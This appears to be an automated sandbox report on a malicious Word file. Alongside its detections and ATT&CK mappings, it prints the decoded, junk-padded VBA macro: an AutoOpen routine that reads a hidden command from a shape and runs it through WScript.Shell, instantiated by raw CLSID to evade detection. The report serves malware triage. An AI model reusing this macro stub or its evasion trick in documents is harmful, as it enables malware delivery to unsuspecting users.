MALICIOUS
252
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample contains VBA macros that leverage the `WScript.Shell` COM object to execute a command-line payload. This payload is heavily obfuscated but appears to be designed to download and save a second-stage executable, likely from one of the embedded URLs, and then execute it. The use of `cmd.exe` with execution flags and the `GetObject` call are strong indicators of malicious intent.
Heuristics 9
-
ClamAV: Doc.Malware.Powload-6794695-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Powload-6794695-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUSVBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.Matched line in script
End Select Set ZZKijTUEO = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + JatIQwX) On Error Resume Next -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
End Select Set ZZKijTUEO = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + JatIQwX) On Error Resume Next -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12509 bytes |
SHA-256: ebd3b826e21b8f0a178abe8b91f77b215a5b07ae99b070be4df57d42c7ecd6ea |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
150 of 239 identifiers look randomly generated (e.g. 'XIZqfYfGWLzjO') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "XIZqfYfGWLzjO"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
For Each tCRmww In cjOZubIUH
kTidzb = 112378313 + Oct(199149819) - 145297173 - CBool(68214206 / 158638743) * 210112948 + Log(BWDFEpWI - CLng(42217841)) - 121179680 + Hex(UWaQwB)
Next
Select Case nIlSZJi
Case 313746974
AIanbwB = Cos(85802899)
rWDfl = 31330792
Case 195015284
UJbAA = Sqr(208968723 / CSng(134342122 - Cos(207623383 - 242741274) + viztXIN + Rnd(148788059 - 338837569)))
ijYUNNGf = Hex(IXhoXpZ)
End Select
On Error Resume Next
For Each zbWzcRhHC In VQIIhBfbO
bfAvuww = 285128931 + Oct(328483897) - 269893510 - CBool(230402183 / 233212404) * 262124774 + Log(FVTZhOA - CLng(137751222)) - 125701621 + Hex(wRCYTM)
Next
Select Case OspTTbaF
Case 209804501
qJNPmd = Cos(218375070)
MhGtz = 145696194
Case 46301993
lwcuYX = Sqr(246078164 / CSng(21915691 - Cos(132193451 - 280941349) + ImttTBtKL + Rnd(34774905 - 333976953)))
oVVHif = Hex(tTMGpdc)
End Select
On Error Resume Next
For Each NZVHrkKL In TjuLhH
lVtAMKsU = 259077105 + Oct(175872382) - 96739789 - CBool(35102662 / 198149222) * 290174166 + Log(jNMjf - CLng(284338957)) - 92618784 + Hex(bZKUcwhol)
Next
Select Case iSwlj
Case 174291133
jATQV = Cos(32184809)
TMzjzzbw = 155141669
Case 162786170
aCqPVG = Sqr(252119536 / CSng(194267258 - Cos(6805720 - 311031811) + Ivilhzq + Rnd(305159641 - 210617841)))
UcAQz = Hex(pncku)
End Select
Set zcGIqZF = Shapes("vDinjphmffzs")
On Error Resume Next
For Each MDRDNark In uAGiriYA
mrEdQHZlp = 254285671 + Oct(19122784) - 162367836 - CBool(336891763 / 66175435) * 173302926 + Log(KSISf - CLng(163333038)) - 155647580 + Hex(cNjYMRtTA)
Next
Select Case BWijmJ
Case 201942448
kEhHvqj = Cos(194704665)
PPiLNTFA = 19093991
Case 182887480
ZXtjY = Sqr(248290747 / CSng(53285955 - Cos(26037610 - 121193674) + jwnEoTS + Rnd(143824799 - 123476259)))
sjkdDRBo = Hex(cijhi)
End Select
pJIiAJ = "" + ziJic + jQuHY + zcGIqZF.TextFrame.TextRange.Text + fkmIqnPj + TBpswRJ
On Error Resume Next
For Each KlzYSHp In QhKMTjcLF
voNuPju = 234496582 + Oct(1425250) - 31340175 - CBool(142093183 / 33377164) * 125691362 + Log(sUijbHC - CLng(74975817)) - 338099482 + Hex(zwmqKT)
Next
Select Case BKBPRQ
Case 103785002
QdjHlcL = Cos(92786179)
TwBwjwZk = 269902525
Case 338384224
SzDZjrUuR = Sqr(79108391 / CSng(176429965 - Cos(28057715 - 99123954) + KdTEOl + Rnd(251134105 - 229025172)))
WLRRR = Hex(bicQSC)
End Select
On Error Resume Next
For Each ftkth In HASoPDlQp
SFRous = 156988949 + Oct(76575773) - 86076362 - CBool(188578818 / 122962510) * 131309480 + Log(DaIAcWW - CLng(220659342)) - 189999582 + Hex(joEoFF)
Next
Select Case DHMAZt
Case 251970365
PnVZjEf = Cos(257714439)
ONGCJuS = 200111815
Case 277042021
lzpDSGBZK = Sqr(47967789 / CSng(146232941 - Cos(199003495 - 220110428) + YMiBIwH + Rnd(1979232 - 9859246)))
ZswItNu = Hex(jzAbajD)
End Select
On Error Resume Next
For Each ApwVn In CMELjroC
GmmnTI = 150319400 + Oct(74223059) - 164437374 - CBool(106263990 / 196000478) * 306182640 + Log(aWsjLb - CLng(139535718)) - 156415883 + Hex(iwRthOjrn)
Next
Select Case PrOHz
Case 13310610
rdiXFJum = Cos(250255883)
TAjNhtPI = 264091739
Case 148511364
bIihcZi = Sqr(161598292 / CSng(73405706 - Cos(97771756 - 310491447) + bjrtTYoW + Rnd(50072898 - 310411630)))
NqHqiwzz = Hex(fLQVz)
End Select
Set ZZKijTUEO = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + JatIQwX)
On Error Resume Next
For Each kPvffaG In iXnFZ
TwMcLFH = 106739644 + Oct(49428363) - 184576167 - CBool(190154976 / 113153842) * 161566816 + Log(GYiKm - CLng(68716136)) - 335240117 + Hex(DTQzKq)
Next
Select Case hXPHmUX
Case 152511519
RdPUHS = Cos(18580377)
BCwGpd = 124286432
Case 100634376
FvsMOuQ = Sqr(246946014 / CSng(168943465 - Cos(31805175 - 91061648) + ljjBV + Rnd(296581296 - 65308892)))
iFkQCvIsY = Hex(twrMPbiAD)
End Select
On Error Resume Next
For Each CqlvcV In DXlrz
hzuha = 333954160 + Oct(188842666) - 270372512 - CBool(1665060 / 77100024) * 252099489 + Log(tsJBivHEr - CLng(138430097)) - 201600949 + Hex(jRaWS)
Next
Select Case MoqXm
Case 162925158
GwSmbB = Cos(202943925)
wjcqBsqju = 103417532
Case 80444247
qAIXGW = Sqr(314512782 / CSng(338263058 - Cos(325885581 - 45266167) + FlmYwoR + Rnd(104111737 - 125393019)))
FhizfRLVF = Hex(HaEYFnujF)
End Select
On Error Resume Next
For Each MZzwQnqo In QDooRffIS
azQpnQa = 230397907 + Oct(66222082) - 321930399 - CBool(260581950 / 292594431) * 265421505 + Log(OqnwjQL - CLng(166795692)) - 323400044 + Hex(AozpDniO)
Next
Select Case CVlvkMfqE
Case 212535782
HXPOabrhb = Cos(12874634)
BBdowS = 244782857
Case 204857202
OZulEcu = Sqr(25431236 / CSng(247759652 - Cos(3871274 - 174536033) + tFjcZ + Rnd(229238273 - 97945176)))
wBmwnTk = Hex(vONEZJ)
End Select
On Error Resume Next
For Each FjGpuG In dhSwCGjpz
DzkuJs = 130566134 + Oct(230877970) - 315485465 - CBool(240704876 / 280430972) * 270157331 + Log(KNSBXp - CLng(206175781)) - 274272612 + Hex(JpBLYZvv)
Next
Select Case QVKpwa
Case 160069389
onGzWzoQH = Cos(230948378)
FMASYUnv = 296698585
Case 328270162
unARZT = Sqr(44745590 / CSng(134832990 - Cos(96197724 - 290347221) + bAsijnp + Rnd(87782821 - 311598299)))
qKqHQC = Hex(VLifwTsT)
End Select
Const YqdNOZWNFsO = 0
On Error Resume Next
For Each vHRwKItYm In XkmmqNuC
qmtpjYMI = 5261330 + Oct(337583859) - 28218305 - CBool(16521689 / 250367537) * 113303406 + Log(wJGucPw - CLng(78686759)) - 223488177 + Hex(TzJjrlZjk)
Next
Select Case JBSkZwzs
Case 167638167
ilTMqjGz = Cos(168295996)
taLsMZ = 21015202
Case 188878421
NiVBi = Sqr(107425643 / CSng(304311773 - Cos(284297681 - 144605082) + iQDmzOi + Rnd(210510536 - 317704214)))
KfaHRpiqa = Hex(AuWjLDM)
End Select
On Error Resume Next
For Each jjcwwAsO In YmJLIVNPb
wHtioIC = 131669723 + Oct(297451596) - 260858401 - CBool(167628492 / 130122781) * 24120620 + Log(vKkwwE - CLng(334771589)) - 16762167 + Hex(BvImAHij)
Next
Select Case VPHjqF
Case 267809812
vjzbSFivP = Cos(328242907)
PQXjwWri = 209152702
Case 147033808
MOGJz = Sqr(267054494 / CSng(40785877 - Cos(100795948 - 130272771) + JIISDJiq + Rnd(167446204 - 281235507)))
JtRwwiLK = Hex(WITuTkUIH)
End Select
On Error Resume Next
For Each OfzHou In JwEUAOZXi
biiXh = 190053357 + Oct(140719652) - 98975785 - CBool(238431501 / 184009054) * 52328566 + Log(iwAjiEJ - CLng(188550759)) - 183517849 + Hex(GqWsHVjHt)
Next
Select Case GWbJAth
Case 16663999
sESmdSG = Cos(127611853)
fVNGjk = 156406794
Case 259854236
oVzfd = Sqr(229912357 / CSng(225648339 - Cos(160167525 - 48209067) + qjpWHAi + Rnd(251020476 - 261580179)))
sZACT = Hex(XLAqqlM)
End Select
On Error Resume Next
For Each sBdkdLfBZ In ihuEXJu
jhbnjkV = 342184647 + Oct(35294010) - 149084274 - CBool(163655035 / 118014504) * 252883244 + Log(cWnDuM - CLng(340869608)) - 98673304 + Hex(TlfRFULCd)
Next
Select Case DZNREVsPd
Case 40155471
dHmRE = Cos(154286559)
UPiVRp = 55739726
Case 13121030
TPftT = Sqr(311442042 / CSng(186194380 - Cos(229554633 - 286130372) + EjhBzV + Rnd(58517834 - 230879489)))
iszAzuiOH = Hex(IXJCUZzw)
End Select
On Error Resume Next
For Each QAbrKN In THbVkjE
TiiPqMLTA = 84060069 + Oct(12611690) - 96872909 - CBool(120321703 / 194036103) * 184622630 + Log(wnDBvd - CLng(236748226)) - 108238166 + Hex(LUjbjA)
Next
Select Case rkzSoDw
Case 12798221
hbiIw = Cos(30508862)
fHWzfCzpu = 95623090
Case 331322088
sbrTLYX = Sqr(224383702 / CSng(209110041 - Cos(61910038 - 205578225) + oBvOBFHSH + Rnd(200701511 - 27745161)))
KDzokH = Hex(ZFTJipH)
End Select
On Error Resume Next
For Each jomNUGAW In JjwrZ
BjBrp = 212867215 + Oct(1993251) - 214060530 - CBool(188161058 / 36976412) * 336378897 + Log(Dtzhs - CLng(47427158)) - 327097053 + Hex(ZjzYfKqSu)
Next
Select Case VjAAp
Case 325411059
bSBjH = Cos(64390780)
VFzcC = 179905002
Case 260675052
ubcUjcMfp = Sqr(223196655 / CSng(247638907 - Cos(121503574 - 234528600) + zCDBYR + Rnd(270395754 - 319442234)))
RWpDZN = Hex(PTWioY)
End Select
ZZKijTUEO.Run! pJIiAJ, YqdNOZWNFsO
On Error Resume Next
For Each mDSRNbQ In pwLzCLj
NjzDQSW = 28521830 + Oct(46801003) - 77671906 - CBool(52421925 / 9402214) * 31357133 + Log(Bakjz - CLng(76881356)) - 186922943 + Hex(YvPsovj)
Next
Select Case fDjEF
Case 197606317
WNUhO = Cos(67366311)
TOVjw = 241016264
Case 89213563
OVwmHDo = Sqr(162280576 / CSng(196984544 - Cos(173743803 - 157300997) + jEVAD + Rnd(155565286 - 118291919)))
SdiOQX = Hex(AWHwvpJ)
End Select
On Error Resume Next
For Each iZdpF In Uawli
nUfOqzAic = 285244140 + Oct(156430341) - 38281510 - CBool(128212703 / 172978297) * 325938849 + Log(KKhNjz - CLng(283682856)) - 10685003 + Hex(ZRKqRoPim)
Next
Select Case TrJUFMYZ
Case 260899405
XWfHA = Cos(102563597)
EQOoddPQ = 208631984
Case 277927964
KCIXhkibB = Sqr(275503653 / CSng(187462752 - Cos(8352407 - 48249859) + DzbDmCp + Rnd(15225306 - 19543668)))
SYBqNt = Hex(ZWjOl)
End Select
On Error Resume Next
For Each jjdGlzvfL In KGKYkfCH
MzBNkUs = 84301880 + Oct(6496923) - 289920881 - CBool(318138230 / 157775463) * 204418339 + Log(uWvzF - CLng(212113130)) - 55957420 + Hex(kjlHhwLT)
Next
Select Case kJKttiVt
Case 246511817
kunOQfFPB = Cos(266420009)
zbQhNVbd = 259275296
Case 317289365
hGMOU = Sqr(57297455 / CSng(5257771 - Cos(291846325 - 169393740) + TmYkw + Rnd(114481797 - 139774352)))
cjJfCmh = Hex(LjJuPwziN)
End Select
On Error Resume Next
For Each qTjqwf In EhdAwE
KbXzWJ = 78796853 + Oct(30647158) - 337293845 - CBool(206463953 / 241990802) * 140367273 + Log(wZEFoDLLQ - CLng(39957539)) - 282306390 + Hex(hboZzpXC)
Next
Select Case ipvnvjB
Case 252434425
AGamQf = Cos(192246898)
LtsHtVj = 100545256
Case 270212401
XiBqMTYU = Sqr(233397964 / CSng(62739947 - Cos(113861923 - 295591039) + JZwFkHv + Rnd(72567514 - 59446344)))
ZdiJNkUOY = Hex(wiHSK)
End Select
On Error Resume Next
For Each QNDAKCqz In BamncLM
YStEC = 245489871 + Oct(276736793) - 215207724 - CBool(333296236 / 120790748) * 228769178 + Log(EBAVOGi - CLng(277160228)) - 51330166 + Hex(njOHMVOj)
Next
Select Case oEhGu
Case 82416589
OcNULkIW = Cos(122456823)
aQYVcWBif = 69462747
Case 277720160
ZUSPMuVWu = Sqr(38665808 / CSng(59746427 - Cos(229226672 - 291790028) + cndCa + Rnd(283971110 - 272496274)))
uzKkLi = Hex(XOBpTDsB)
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.